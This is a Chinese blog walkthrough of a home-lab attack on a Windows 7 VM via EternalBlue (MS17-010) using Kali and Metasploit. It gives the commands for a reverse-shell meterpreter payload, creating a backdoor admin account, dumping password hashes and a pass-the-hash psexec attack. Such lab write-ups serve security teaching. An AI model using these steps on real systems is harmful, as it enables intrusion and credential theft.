通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作

已于 2023-03-17 16:48:51 修改
阅读量2.8k 收藏 46
点赞数 6
分类专栏: 网络安全 文章标签: linux 安全 网络安全 Powered by 金山文档
于 2023-03-17 16:44:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60182338/article/details/129622710
版权

环境说明

机器

ip地址

Kali主机

192.168.231.129

win7靶机

192.168.231.143

一、获取目标主机的管理员权限

1.使用kali虚拟机作为攻击机,利用nmap扫描获取目标的IP地址及漏洞,将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT,即在一个网段里面,然后进行扫描网段,查看存活主机,下面是两台机器的ip地址查看,可以看到两台机器在同一个网段内,

即网段都在192.168.231中

2.然后可以使用命令:Nmap -v –sP 192.168.231.1/24进行网段扫描,

可以看到140和143的主机是存活的(因为这里我还开了一台靶机WindowsXP,该实验同样可以在WindowsXP中实现,实验步骤一样),还有一点发现就是在网段扫描中不会出现129的出现,

因为129是Kali攻击机的ip地址,所以不会显示;

3.然后扫描目标主机的漏洞,使用命令:nmap -v --script=vuln 192.168.231.143(这里包括以后都以win7为例,winXP是同样的操作),

可以看到这里有一个ms17-010的漏洞,即我们熟知永恒之蓝漏洞,我们就可以利用这个漏洞来获得靶机的shell,

4.使用命令:msfconsole,进入metasploit工具,

然后使用search命令,搜索永恒之蓝有什么可以利用的部分,search ms17-010,

可以看到有0-4五个可以利用的漏洞,这里我们使用0栈溢出漏洞,使用use 0即可,

5.然后它提示我们没有设置载荷,可以使用set命令来设置载荷,如:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

6.然后查看攻击模块所需要配置的参数:show options,

7.在这里我们需要配置lhost,rhost,target,

为了确保参数都配置好了,我们还是查看一下,

可以看到该配置的参数都配置好了,然后就可以进行攻击了,

8.使用run命令,进行渗透攻击,

可以看到我们已经成功渗透进入了win7,并获取了管理员权限,

9.然后进入win7目标机命令窗口,shell,

可以看到出现了乱码,然后我们可以进行调整回正确的显示,输入:chcp 65001即可,

然后我们就可以进行后渗透操作。

二、创建管理员账户

1.首先我们在win7的 控制面板->用户账户和家庭安全->用户账户->管理账户中可以查看现在已有的账户,然后我们进入shell并在目标机创建新的管理员用户,使用命令net user hacker hacker123 /add

2.但在这里我们可以看到,新建的用户hacker并不是一个管理员用户,所以还需要进行提权操作,使用命令,net localgroup Administrators hacker /add

然后我们可以看到hacker有之前的标准用户变成了管理员用户,

三、提取系统用户和密码hash值

提取系统用户名和密码Hash,使用命令,run post/windows/gather/hashdump

可以看到这里有刚刚创建的管理员用户hacker的用户名和hash密码,

四、hash重放攻击

1.所谓重放密码hash攻击,就是不再利用该漏洞,直接通过账户名和密码hash值进行攻击账户,从而达到获取管理员权限的目的。所以我们得退出现有的环境,不用该漏洞,直接exit,然后再重新进去msf,使用msfconsole,

2.接着使用命令:use windows/smb/psexec;并进行payload的设置,set PAYLOAD windows/meterpreter/reverse_tcp;然后设置主机和靶机的ip,

3.在设置账户和密码hash之前要先将win7下的UAC关闭,并将win7重启,不然会失败,

4.设置账户,set SMBUser sherry即可,接着就是使用密码hash进行重放攻击了,直接使用之前获取的hash密码,set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8d3ac1c35a759a467f1d77ff0419a9

在渗透之前再查看一遍参数是否全部设置成功,

5.在全部准备工作完成好之后,直接exploit即可,也可以使用run运行,

栩珩
关注
  • 6
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
kail使用msf工具利用永恒之蓝漏洞攻击win7
m0_73948163的博客
12-30 787
show options 另外Required为yes的也需要设置。我们输入shell就可以进入到win7的cmd。最后使用creds_all命令抓取明文密码。接下来我们可以查看需要设置的IP地址和端口。这上面有三个可以利用漏洞我们选择第一个。其实还有很多可以执行的操作就不一一列举了。还可以使用screenshot命令截屏。还可以使用mimkatz抓取明文密码。除此之外还需要设置payload。先使用hashdump抓取密码。这是几个渗透后可以使用的命令。我们查看win7的IP。设置完成后就进行攻击。
2024年网络安全最新Kali 永恒之蓝(最基础的攻击指令),深入解析网络安全核心组件和应用框架
2401_84520118的博客
05-12 948
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!使用模块后就是设置模块了,使用命令来查看当前模块的设置: 设置攻击的目标:继续使用show options来查看模块设置,其中比较关键的就是攻击的载核,如果与自己需
kali渗透测试——渗透攻击(基础+攻击永恒之蓝操作系统)
2302_80189643的博客
05-29 291
使用auxiliary/scanner/smb/smb_ms17_010模块加载检测,set rhosts设置目标主机,run执行,search搜索ms17_010漏洞渗透模块。使用编号为0的模块,加上use启动模块,然后使用show options命令查看这个模块需要设置的参数。(4)Check是检查,表示该漏洞利用模块是否包含检测功能,用于验证目标系统是否存在该漏洞。(5)Description是描述,对漏洞利用模块的功能、目标、影响等信息简要描述。(2)模块命令(Module Command)
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
热门推荐
linxaiomo
02-20 1万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
MSF永恒之蓝漏洞利用详解[漏洞验证利用及后渗透]【详细版】
h1008685的博客
04-05 938
MSF永恒之蓝漏洞利用详解[查找脚本,漏洞验证,漏洞利用,获取用户凭证,屏幕监控,进程迁移,键盘记录,防火墙配置指定端口,禁用UAC,使用nc(瑞士军刀)工具设置持久性后门,配置计划任务]
经典利用永恒之蓝漏洞对Windows操作系统进行攻击
qq_46202048的博客
11-25 1万+
利用永恒之蓝对Windows进行攻击 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 3873
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
使用ms17-010永恒之蓝漏洞对win7进行渗透
qq_44774215的博客
11-13 4232
使用ms17-010永恒之蓝漏洞对win7进行渗透
kali永恒之蓝
qq_52820087的博客
10-25 7520
kali永恒之蓝攻击写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤五、种植后门 写在前面   这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,纯属兴趣爱好,本人非网络安全专业。写这个呢是为了记录一下去年我第一次在虚拟机上成功实现了永恒之蓝攻击,同时给一个”小朋友“做参考。目前,永恒之蓝漏洞已经销声匿迹了,所以大可不必担心。 一、永恒之蓝是何方神圣?   永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影
渗透基础笔记+作业(永恒之蓝复现)
09-08
工具如Nmap用于网络扫描,Metasploit则作为渗透框架,利用已知漏洞进行攻击。在复现过程中,测试者会模拟攻击流程,以理解漏洞利用方式和防范措施。 总结起来,渗透测试是一个综合性的过程,涵盖了情报收集、威胁...
永恒之蓝测试.docx
07-23
永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,我们需要使用 Nmap 工具来扫描目标主机的开放端口和服务。命令为:`nmap –Pn –Sv –T4 IP 地址`,其中 `-Pn` ...
50-50.渗透测试-Kali Linux漏洞利用
05-10
50-50.渗透测试-Kali Linux漏洞利用
Kali Linux:用永恒之蓝对 Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 5706
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
Linux初学基本命令
yuan20010401的博客
07-25 476
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux】进程间通信 —— 管道与 System V 版本通信方式
最新发布
qq_45666995的博客
07-25 705
一文详尽 管道与 System V 版本的进程间通信方式。
Linux下如何设置系统定时任务
小筱在线博客
07-24 432
需要注意的是,cron工具使用的时间是系统时间,所以请确保系统时间正确设置。其中,分钟表示指定的分钟数(0-59),小时表示指定的小时数(0-23),日表示指定的日期(1-31),月表示指定的月份(1-12),周表示指定的星期(0-7,其中0和7都表示星期天)。cron是一个守护进程,用于在指定的时间间隔执行指定的命令或脚本。这将在每天的凌晨1点到凌晨3点之间每隔30分钟执行指定的命令或脚本。这将在每天的凌晨1点和下午3点执行指定的命令或脚本。这将在每天的凌晨1点执行指定的命令或脚本。
kali永恒之蓝漏洞渗透
09-05
永恒之蓝是指微软Windows操作系统中的一个漏洞,也被称为ms17-010漏洞。通过利用永恒之蓝漏洞,黑客可以在目标机器上执行远程代码,获得对系统的控制权。在Kali Linux中,可以使用一些工具来进行永恒之蓝漏洞渗透测试。 首先,使用auxiliary/scanner/smb/smb_ms17_010模块进行扫描目标主机,以确定是否存在漏洞。如果扫描结果显示存在漏洞,可以进一步使用exploit/windows/smb/ms17_010_eternalblue模块进行渗透。这个模块可以利用永恒之蓝漏洞远程执行代码,获取目标主机shell。 在Kali Linux中,可以使用search命令来搜索有关永恒之蓝漏洞的可利用部分。具体来说,可以使用search ms17-010命令来搜索与ms17-010漏洞相关的可利用模块或脚本。 需要注意的是,在进行任何渗透测试之前,请确保您已获得合法的授权,并且仅在合法范围内使用这些工具和技术。任何未经授权的渗透测试活动都是非法的。 总结起来,Kali Linux中可以使用smb_ms17_010和ms17_010_eternalblue工具来扫描和渗透永恒之蓝漏洞使用search命令可以搜索与该漏洞相关的可利用部分。在进行任何渗透测试之前,请确保遵守法律法规并获得合法授权。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分渗透操作](https://blog.csdn.net/weixin_60182338/article/details/129622710)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)](https://blog.csdn.net/weixin_42474227/article/details/122237494)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值